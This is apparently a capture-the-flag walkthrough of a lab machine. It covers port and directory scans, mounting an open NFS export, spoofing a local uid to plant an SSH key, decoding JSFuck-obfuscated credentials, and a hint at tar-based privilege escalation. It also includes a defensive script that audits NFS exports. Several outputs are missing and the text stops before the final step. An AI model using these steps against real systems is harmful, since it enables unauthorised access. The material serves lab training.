We start by scanning the host with: nmap -A -T4 -p- 192.168.1.20 -vv

Running dirb http://192.168.1.20 /usr/share/dirb/wordlists/big.txt

Port 111 is open, so we use showmount -e 192.168.1.20

Now we mount the folder to our machine
mkdir /tmp/morris
mount 192.168.1.20:/home/morris /tmp/morris

But now we can’t do anything, as it gave us Permission Denied. Let’s create a morris user on our machine so we can copy the ssh file to the host.
ls -ld morris
drwxr-xr-x 8 1000 1000 morris 4096 Oct 11 14:40 morris
groupadd --gid 1000 morris_group
useradd --uid 1000 --groups morris_group morris
mkdir morris/.ssh
cp ~/.ssh/id_rsa.pub morris/.ssh/authorized_keys
When we try to log in using ssh morris@192.168.1.20 -p 7822, it asked for a password, so I guess we have to try another way.
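
Matching uid 1000 locally gets past the permission check because an NFS export using the default AUTH_SYS security trusts whatever uid the client sends. As an added example (not part of the original write-up), this Python sketch audits exports(5) entries for that condition; the sample export lines and the flag names are constructed, since the target's /etc/exports is not shown.

```python
import re

# Constructed sample in exports(5) syntax; the target's real /etc/exports
# is not shown in the write-up.
SAMPLE_EXPORTS = """\
/home/morris  *(rw,sync,no_subtree_check)
/srv/build    192.168.1.0/24(rw,sync,no_root_squash)
/srv/docs     docs01.example.internal(ro,sync,sec=krb5p)
"""

ANY_HOST = {"", "*", "0.0.0.0/0", "::/0"}
SPEC = re.compile(r"([^()]*)(?:\(([^()]*)\))?")


def audit_exports(text):
    """Return [(path, client, [flags])] for export entries that carry risk.

    Handles one export per line; continuation lines, quoted paths and
    '-option' default lists are out of scope for this sketch.
    """
    results = []
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 2:
            continue
        path, specs = fields[0], fields[1:]
        for spec in specs:
            m = SPEC.fullmatch(spec)
            if m is None:
                continue
            # An empty client, e.g. a stray "(rw)" after a space, means any host.
            client = m.group(1)
            opts = [o for o in (m.group(2) or "").split(",") if o]
            sec = next((o[4:] for o in opts if o.startswith("sec=")), "sys")
            flags = []
            if client in ANY_HOST:
                flags.append("any-host")
            # AUTH_SYS: the server believes the uid/gid the client sends.
            # root_squash only remaps uid 0, so uid 1000 passes through.
            if "sys" in sec.split(":") and "all_squash" not in opts:
                flags.append("client-uid-trusted")
            if "no_root_squash" in opts:
                flags.append("no_root_squash")
            if flags and "rw" in opts:
                flags.append("writable")
            if flags:
                results.append((path, client or "*", flags))
    return results


if __name__ == "__main__":
    for path, client, flags in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} -> {client}: {', '.join(flags)}")
```
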
I downloaded all the files I found on the site, from pictures to the css. Using strings and cat on the pictures didn’t come up with any results, but I found a file, bootstrap.min.cs, to be weird, with a lot of string coding. After looking on Google for a while I found this site, www.jsfuck.com. I copied the content of the file without the “” and removed the var= from the file and ran it, and it came up with:

Now we have another user Norris, and the password TryToGuessThisNorris@2k19

Now, going into FTP, we can download the bak files to our machine

Norris
TryToGuessThisNorris@2k19
mget *.bak
Going into the files with the strings command, we can see one file, game.jpg.bak

It hit me to see it as Morse code; I decoded it online and got this message

cd to /var/www/html and ls -la

Trying to open the file .sercetfile.swp in the browser, we then download it to our machine, and running strings on it gave us:

After enumerating for a while I found we can use the tar command; now it’s easy to use tar as:
